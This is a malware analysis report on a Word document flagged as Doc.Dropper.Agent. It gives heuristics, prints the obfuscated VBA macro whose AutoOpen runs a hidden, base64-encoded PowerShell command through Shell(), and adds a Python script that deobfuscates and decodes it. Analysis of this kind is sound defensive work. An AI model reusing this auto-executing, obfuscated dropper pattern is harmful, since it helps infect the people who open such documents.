Verdict: MALICIOUS
Risk Score: 242

MITRE ATT&CK
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment

Malware Insights
The sample is a malicious Word document carrying VBA macros. The auto-executing Autoopen procedure calls pHtzd, which hands the string returned by iuZAEiW to Shell() with vbHide. That string is assembled from dozens of short literals spread across helper functions and interleaved with arithmetic on unassigned variables that exists only to pad the code (every procedure runs under On Error Resume Next). Resolved, it reads PowersHeLL -WinDowsTyle hidden -e <base64>: the leading P comes from Chr(vbKeyP), and the mangled parameter name still works because PowerShell matches parameter names case-insensitively. The base64 argument decodes (UTF-16LE) to an ieX over a .NET format-string template ("{44}{104}{98}..."), a second obfuscation layer whose argument list lies beyond the truncated preview, so neither the download URL nor the second-stage logic is recoverable from this page. The downloader characterization therefore rests on the ClamAV name Doc.Dropper.Agent and on the shape of the command, not on an observed network fetch.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6555314-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6555314-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that the rule text conflicts with the artifact section below, where olevba did recover the VBA project; read this finding as redundant with the AutoOpen finding rather than as evidence of a separate WordBasic macro.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML schema namespace that Office writes into every drawing part, so it is not a network indicator for this sample.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15320 bytes |

SHA-256 (macros.bas): 4d3f0fef59276cf23de97a124575be2774f6cf266e3e231b786e9bb0fa19fac6
Preview script (first 1,000 lines of the extracted script; the listing is cut off partway through PFDVqbAoP)

```vba
Attribute VB_Name = "GdEswVpwQSo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function iuZAEiW()
On Error Resume Next
zkjim = cFocXs - Cos(pZHck) * 1 - Chr(73803) / 28466 - ChrB(XDtoPw)
oUvJAQ = 68121
wSiPN = kpZRw - Cos(lWJHYf) * 1 - Chr(36612) / 54370 - ChrB(nuXdzQ)
hNslG = 4344
iuZAEiW = FqNfhziY + PFDVqbAoP + ZbKinzvB + HpRniEwwPQ + cfrQGXvQp + iHqXlPVuM + FXolR + UOiinSm + YaUjYfZzmzY
JCXBc = OTXRUs - Cos(LolVz) * 1 - Chr(13757) / 82004 - ChrB(YLlOo)
IMYMY = 66969
End Function
Sub Autoopen()
On Error Resume Next
AFBdq = STXFJG - Cos(IsbXnw) * 1 - Chr(22339) / 97021 - ChrB(qlnnWG)
wEvKF = 21611
pHtzd (iuZAEiW)
jrGRYr = FbHqH - Cos(kBYZX) * 1 - Chr(27489) / 29279 - ChrB(PqDSL)
YANws = 95124
End Sub
Function pHtzd(UjziHtpf)
On Error Resume Next
sjhhn = jkKfw - Cos(rWwjW) * 1 - Chr(74609) / 83588 - ChrB(UTACzM)
cFNLwK = 9838
VrsjGf = FKHDUp - Cos(UrJABp) * 1 - Chr(47585) / 60398 - ChrB(hacHfz)
zEmib = 78373
EOTHX = Shell(FkCdKp + Chr(vbKeyP) + zZXzBwfVio + UjziHtpf, vbHide)
CkQrOp = vrpAkW - Cos(zIQTq) * 1 - Chr(25649) / 19916 - ChrB(iYzIr)
wiKBf = 24656
End Function
Attribute VB_Name = "QlzKpimi"
Function FqNfhziY()
On Error Resume Next
wLusT = NrGQH - Cos(wSMRk) * 1 - Chr(73425) / 17732 - ChrB(SaCwi)
WtWTrD = 75141
OGCiQ = "owersHeLL -WinD" + "owsTyle hi" + "dden -e" + " IABp"
iFaiYO = whzIw - Cos(IZsBjO) * 1 - Chr(13873) / 93095 - ChrB(IwKfs)
UmZEi = 36259
JPJWJTjk = "AGUAWAAgACgAKA" + "AoACIAew" + "A0ADQA" + "fQB7ADEAMAA0" + "AH0AewA5ADgA" + "fQB7ADEA" + "fQB7ADYAOQB9" + "AHsAOAAyAH0AewA"
HqGNuk = tCnlC - Cos(TiSHo) * 1 - Chr(61274) / 63987 - ChrB(wcTtW)
dvaDS = 34516
ziJRhfl = "xADYAfQB" + "7ADIA" + "OQB9AHsAM" + "QAwADMAfQB7"
SBvVT = cfFKZ - Cos(dApTRQ) * 1 - Chr(96774) / 72272 - ChrB(KOmUYj)
zcjSkt = 2243
bQpajCjHYt = "ADEAO" + "QB9AHsAMgA" + "0AH0AewAxADg" + "AfQB7ADYAMgB9A" + "HsANgA2AH0Aew" + "A1ADQAfQB7ADgA" + "NQB9AHsAMQAx" + "ADQAfQB7ADYA" + "NQB9AH"
WlUJEb = SuQsAo - Cos(JnUjoH) * 1 - Chr(74724) / 18258 - ChrB(ummhd)
GrkzMw = 61485
SpjqWO = "sAMwAwAH0Aew" + "A3ADkAfQB7" + "ADgANgB" + "9AHsANQA4" + "AH0AewAyADUAf"
ojFTwr = jiCWS - Cos(wEEtqN) * 1 - Chr(69602) / 49944 - ChrB(SuOro)
HBbid = 85167
QkwVFoVz = "QB7ADcAMAB" + "9AHsAMQAwA" + "DYAfQ" + "B7ADcAf" + "QB7ADQAfQ" + "B7ADQ"
zjoqSz = DkKKi - Cos(njFVj) * 1 - Chr(91882) / 41113 - ChrB(NKFEC)
ZharpE = 36921
iizUvdRAc = "ANQB9" + "AHsANgA" + "wAH0A" + "ewAzA" + "DkAfQB7ADEAMA" + "AwAH0AewAzADMA" + "fQB7ADMA" + "NQB9AHsANwA0A"
FqNfhziY = OGCiQ + JPJWJTjk + ziJRhfl + bQpajCjHYt + SpjqWO + QkwVFoVz + iizUvdRAc
End Function
Function PFDVqbAoP()
On Error Resume Next
VFAvm = TijDN - Cos(kbwGuh) * 1 - Chr(44061) / 26912 - ChrB(YjmPRp)
JSUao = 66889
zEcKw = "H0AewAxADQAfQB7" + "ADkAMwB9A" + "HsAMwA2AH0" + "AewA0ADEAf" + "QB7ADgAOAB9A" + "HsANwAz" + "AH0AewAxA" + "DEANQB"
AVoIJ = fbBqVu - Cos(kTwIhF) * 1 - Chr(35908) / 95435 - ChrB(NfVWw)
QinsC = 32876
OVJakqMv = "9AHsANQAyAH0A" + "ewA4AD" + "kAfQB7ADYANAB9" + "AHsAM" + "QAxADMAfQB7ADU" + "AfQB7ADkANg" + "B9AHsAOAA0AH0A" + "ewAyAD" + "gAfQB7ADQAMgB9"
lGYNPG = iwtWrl - Cos(VMsjQM) * 1 - Chr(59281) / 15618 - ChrB(nnBGK)
Cdsjp = 66608
WsAfvzP = "AHsANwAxAH0AewA" + "xADAAfQB" + "7ADUANwB9AHsANg" + "AxAH0AewAxADA" + "AOQB9A" + "HsANAAwAH0AewA" + "xADAA" + "NwB9AHsANwA" + "3AH0AewA"
jTpLAn = mwfLi - Cos(WuJmEQ) * 1 - Chr(55760) / 95605 - ChrB(aOAmPu)
iKwHf = 55985
QRBpdz = "yADEAfQB7AD" + "QAOQB9AHsANwAy" + "AH0AewAzA" + "DQAfQB7ADUAM" + "QB9AH"
tELrr = oHqXP - Cos(HTGcYF) * 1 - Chr(86270) / 96467 - ChrB(aKOXWW)
UObPt = 41972
VJrFBkt = "sAOAB9AHsANwA4" + "AH0AewAyADM" + "AfQB7ADYANwB9AH" + "sANQA1AH0AewA" + "4ADAAfQB7ADEA" + "MQB9AHs"
hsZlb = SYdXTm - Cos(XiXBmi) * 1 - Chr(60336) / 36457 - ChrB(zTUATn)
wzClDY = 68863
otWfPXMzZj = "AMQAwADIAfQB7AD" + "EAMQAyAH0A" + "ewAxADA" + "AOAB9AHs" + "AMQAwADEA" + "fQB7ADIANgB9" + "AHsAOQA3AH0AewA" + "xADIA ... (truncated)
```
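The resolution described in the insight above can be reproduced mechanically. The Python below is an added example written for this report; it is not part of the analyzer's output or of the sample. It walks a constructed excerpt of the olevba source listed above (one statement per line, most junk arithmetic dropped, only FqNfhziY's fragments included, so the other eight fragment functions named in iuZAEiW resolve to empty strings exactly as an unassigned VBA Variant would), rebuilds the argument that pHtzd passes to Shell(), and decodes the -e argument as UTF-16LE while tolerating the cut-off base64 that the truncated preview leaves behind. The names parse_assignments, bind_call_arguments, evaluate, shell_command, decode_encoded_command and placeholder_order are this example's own.

```python
"""Resolve the string-concatenation obfuscation in the extracted macro and
decode the PowerShell -EncodedCommand it hands to Shell()."""
import base64
import re

# Constructed excerpt of the olevba output shown in this report. Only FqNfhziY's
# fragments are included, so PFDVqbAoP and the other siblings named in iuZAEiW
# resolve to "" here and the recovered encoded command is a prefix of the real one.
VBA_EXCERPT = r'''
Function iuZAEiW()
On Error Resume Next
zkjim = cFocXs - Cos(pZHck) * 1 - Chr(73803) / 28466 - ChrB(XDtoPw)
iuZAEiW = FqNfhziY + PFDVqbAoP + ZbKinzvB + HpRniEwwPQ + cfrQGXvQp + iHqXlPVuM + FXolR + UOiinSm + YaUjYfZzmzY
End Function
Sub Autoopen()
On Error Resume Next
pHtzd (iuZAEiW)
End Sub
Function pHtzd(UjziHtpf)
On Error Resume Next
EOTHX = Shell(FkCdKp + Chr(vbKeyP) + zZXzBwfVio + UjziHtpf, vbHide)
End Function
Function FqNfhziY()
On Error Resume Next
OGCiQ = "owersHeLL -WinD" + "owsTyle hi" + "dden -e" + " IABp"
JPJWJTjk = "AGUAWAAgACgAKA" + "AoACIAew" + "A0ADQA" + "fQB7ADEAMAA0" + "AH0AewA5ADgA" + "fQB7ADEA" + "fQB7ADYAOQB9" + "AHsAOAAyAH0AewA"
ziJRhfl = "xADYAfQB" + "7ADIA" + "OQB9AHsAM" + "QAwADMAfQB7"
bQpajCjHYt = "ADEAO" + "QB9AHsAMgA" + "0AH0AewAxADg" + "AfQB7ADYAMgB9A" + "HsANgA2AH0Aew" + "A1ADQAfQB7ADgA" + "NQB9AHsAMQAx" + "ADQAfQB7ADYA" + "NQB9AH"
SpjqWO = "sAMwAwAH0Aew" + "A3ADkAfQB7" + "ADgANgB" + "9AHsANQA4" + "AH0AewAyADUAf"
QkwVFoVz = "QB7ADcAMAB" + "9AHsAMQAwA" + "DYAfQ" + "B7ADcAf" + "QB7ADQAfQ" + "B7ADQ"
iizUvdRAc = "ANQB9" + "AHsANgA" + "wAH0A" + "ewAzA" + "DkAfQB7ADEAMA" + "AwAH0AewAzADMA" + "fQB7ADMA" + "NQB9AHsANwA0A"
FqNfhziY = OGCiQ + JPJWJTjk + ziJRhfl + bQpajCjHYt + SpjqWO + QkwVFoVz + iizUvdRAc
End Function
'''

ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$", re.M)
TOKEN = re.compile(r'"(?:[^"]|"")*"|[^+"]+')  # a string literal, or a run of non-'+' text


def parse_assignments(src):
    """Map each assigned name to its raw right-hand side. A Function's return value
    is an assignment to the function's own name, so calls resolve through this too."""
    return {m.group(1): m.group(2) for m in ASSIGN.finditer(src)}


def bind_call_arguments(src, env):
    """Bind a one-parameter Function's formal to the name passed at its call site,
    e.g. 'pHtzd (iuZAEiW)' makes UjziHtpf an alias of iuZAEiW."""
    formals = dict(re.findall(r"^\s*Function\s+(\w+)\((\w+)\)", src, re.M))
    for fn, actual in re.findall(r"^\s*(\w+)\s*\((\w+)\)\s*$", src, re.M):
        if fn in formals:
            env[formals[fn]] = actual


def evaluate(expr, env, depth=0):
    """Evaluate a '+'-joined VBA string expression: literals, Chr(vbKeyX), Chr(n)
    and names. Anything else (junk arithmetic, never-assigned names) becomes "",
    which is what an Empty Variant contributes to concatenation."""
    if depth > 64:
        raise RecursionError("assignment chain does not terminate: " + expr)
    out = []
    for tok in (t.strip() for t in TOKEN.findall(expr)):
        if not tok:
            continue
        if tok.startswith('"') and tok.endswith('"'):
            out.append(tok[1:-1].replace('""', '"'))
        elif m := re.fullmatch(r"Chr\(vbKey([A-Z])\)", tok):
            out.append(m.group(1))  # vbKeyA..vbKeyZ are the key codes 65..90
        elif m := re.fullmatch(r"Chr\((\d+)\)", tok):
            out.append(chr(int(m.group(1))) if int(m.group(1)) < 256 else "")
        elif re.fullmatch(r"\w+", tok) and tok in env:
            out.append(evaluate(env[tok], env, depth + 1))
        else:
            out.append("")
    return "".join(out)


def shell_command(src):
    """Recover the string the macro passes to Shell(), or None if there is no Shell() call."""
    env = parse_assignments(src)
    bind_call_arguments(src, env)
    for rhs in env.values():
        if m := re.fullmatch(r"Shell\((.+),\s*vb\w+\)", rhs):
            return evaluate(m.group(1), env)
    return None


def decode_encoded_command(cmdline):
    """Decode the base64 after -e/-ec/-enc/-EncodedCommand as UTF-16LE. A listing
    cut mid-string leaves a partial base64 quantum and possibly a dangling byte;
    both are dropped rather than raising."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64[: len(b64) // 4 * 4])
    return raw[: len(raw) // 2 * 2].decode("utf-16-le")


def placeholder_order(decoded):
    """Indices of the {n} placeholders in the decoded format-string template, in template order."""
    return [int(n) for n in re.findall(r"\{(\d+)\}", decoded)]


if __name__ == "__main__":
    cmd = shell_command(VBA_EXCERPT)
    print("Shell() argument:", cmd[:60] + "...")
    print("decoded -e payload:", decode_encoded_command(cmd))
```

Run as a script it prints the recovered command line and the decoded template; pointed at the complete macros.bas it returns the full command, since the resolver follows every name in iuZAEiW. The placeholder indices expose the second layer: the template is filled from an argument list that follows it in the real command, which is exactly the part of the string the preview never reaches, so the URL and execution logic cannot be read off this page.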